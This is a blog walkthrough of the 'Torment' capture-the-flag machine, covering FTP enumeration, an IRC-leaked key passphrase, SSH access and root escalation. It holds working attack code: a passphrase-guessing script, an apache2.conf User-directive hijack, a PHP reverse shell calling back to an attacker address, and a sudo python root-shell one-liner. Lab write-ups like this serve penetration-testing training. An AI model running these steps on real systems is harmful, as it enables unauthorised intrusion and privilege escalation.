Torment CTF walkthrough (IRC server exploitation and misusing apache server’s intended functionality)

Mridul Bhardwaj
4 min readJun 28, 2021

Security Level: Intermediate

Scanning with nmap

FTP anonymous login allowed

Other ports of interest are also open: 25 (SMTP), 631 (CUPS) and 6667–6669 (IRC).

Exploring files in FTP server

There are two interesting entries, the hidden directories .ngircd and .ssh.

Inside .ssh we find an RSA private key, which we will use later to log in over SSH.

Inside .ngircd there are two channel names that may be useful.

The ngircd.conf file in the same directory contains the default password needed to connect to the IRC server.

I am using the Pidgin IRC client to connect to the IRC server with that default password.

Let's join one of the channels we found earlier in the .ngircd directory.

There is nothing interesting in #games, so we try the other channel.

Joining the second channel from .ngircd, #tormentedprinter.

Yes! We find a password for something, which may be useful later.

We can also see that there are two users present on the machine, patrick and qiu.

Logging in over SSH with the key found earlier, we are asked for a passphrase; the password we found in #tormentedprinter unlocks the key.

We now have initial access; what remains is escalating our privileges to root to capture the flag.
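Before fighting with the SSH prompt it is worth checking offline whether a recovered key is passphrase-protected at all, and whether a candidate password (such as the one from #tormentedprinter) unlocks it. The functions below are an added example, not part of the original walkthrough; they rely on the fact that ssh-keygen -y prints the public half of a key only when the supplied passphrase is correct. The key path, user name and candidate passphrases in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Uses ssh-keygen -y as an
# offline passphrase oracle: it succeeds only if the passphrase decrypts the
# key. Key paths and candidate passphrases below are assumptions.

# Returns 0 if the key cannot be read with an empty passphrase, i.e. it is
# encrypted and "ssh -i" will prompt for a passphrase.
key_is_encrypted() {
    ! ssh-keygen -y -P '' -f "$1" >/dev/null 2>&1
}

# Returns 0 if the given passphrase unlocks the key.
key_unlocks_with() {
    ssh-keygen -y -P "$2" -f "$1" >/dev/null 2>&1
}

# Tries each candidate passphrase (one per argument) in order and prints the
# first one that works; returns 1 if none of them does.
find_passphrase() {
    key=$1
    shift
    for candidate in "$@"; do
        if key_unlocks_with "$key" "$candidate"; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done
    return 1
}

# Usage on the attacking machine, with the key pulled from the FTP share and
# the password noted in the IRC channel (both assumed here):
#   key=./id_rsa
#   chmod 600 "$key"
#   key_is_encrypted "$key" && echo "key is passphrase-protected"
#   pass=$(find_passphrase "$key" 'password-from-irc') && ssh -i "$key" patrick@<target>
```

The same loop takes any number of candidates, so a short list of passwords gathered during enumeration can be tried in one go without risking account lockouts on the SSH server itself.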

As patrick we can run systemctl through sudo without entering a password.

Next we look for files that are readable, writable and executable by everyone (world-writable files) using the find utility.

Appending 2>/dev/null filters out the errors so that they are not printed to the console. In more detail: 2 is the standard error file descriptor, which is where error messages such as "Permission denied" are written; by default they go to the terminal. /dev/null is the standard Linux device for output you want discarded.

Two such files turn up: apache2.conf and index.html.

Adding a User qiu line to apache2.conf, so that Apache's worker processes run as qiu instead of the default user.

Then we prepare a PHP reverse shell script and copy it into /var/www/html so that it can be triggered from the browser.

At the same time we start netcat in listening mode, so that when we request the PHP script the reverse connection comes back to us as user qiu. The new User setting only applies once Apache is restarted, which is what the passwordless sudo systemctl is for.
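The three steps above (find world-writable files, repoint the Apache User directive, drop a reverse shell into the web root) written as shell functions, so they can be rehearsed on a scratch directory before being run on the target. This is an added example and not the author's own commands; the user name qiu, the web root, the file name rev.php and the listener address are assumptions taken from or modelled on the walkthrough.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: the world-writable file
# hunt and the apache2.conf abuse as reusable functions. The user name "qiu",
# web root, file name rev.php and listener address are assumptions.

# 1. World-writable regular files under a root directory. stderr (fd 2) goes
#    to /dev/null so "Permission denied" noise does not flood the terminal;
#    /proc and /sys are pruned because their pseudo-files are not interesting.
find_world_writable() {
    find "$1" \( -path /proc -o -path /sys \) -prune -o \
        -type f -perm -o+w -print 2>/dev/null
}

# 2. Make Apache's worker processes run as another user. Apache reads the
#    configuration sequentially and the last User directive wins, so appending
#    one line is enough. The change only applies after Apache is restarted
#    (sudo systemctl restart apache2 on the target).
set_apache_user() {
    printf '\nUser %s\n' "$2" >> "$1"
}

# Which user the configuration will actually use: the last User line wins.
effective_apache_user() {
    awk '$1 == "User" { u = $2 } END { print u }' "$1"
}

# 3. Drop a minimal PHP reverse shell into the web root. Requesting it in the
#    browser (after the restart) connects /bin/sh back to a listener started
#    with "nc -lvnp PORT", running as whatever user Apache now uses.
write_php_reverse_shell() {
    webroot=$1
    lhost=$2
    lport=$3
    cat > "$webroot/rev.php" <<EOF
<?php
\$sock = fsockopen("$lhost", $lport);
proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
EOF
}

# Usage on the target (paths and address assumed):
#   find_world_writable /
#   set_apache_user /etc/apache2/apache2.conf qiu
#   effective_apache_user /etc/apache2/apache2.conf   # should print qiu
#   write_php_reverse_shell /var/www/html 10.10.10.5 4444
```

Checking effective_apache_user after the edit is the cheap sanity test: on a Debian-style install the original line is User ${APACHE_RUN_USER}, and if the appended line is not the last User directive in the file the reverse shell will come back as www-data rather than qiu.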

Running sudo -l to list the programs qiu can execute with NOPASSWD.

The reverse connection is caught on our local listener.

We can see that qiu can run python with sudo.

The command sudo python -c 'import pty;pty.spawn("/bin/bash")' spawns a bash shell as the invoking user, which under sudo is root, and we get a root shell.

There are two files in the /root directory, proof.txt and author-secret.txt; let's look at them.

Inside author-secret.txt

Inside proof.txt

And with that the machine is successfully rooted.


Mridul Bhardwaj

CEH v10 | CCNA v7 | OSCP aspirant | System and Network Penetration Tester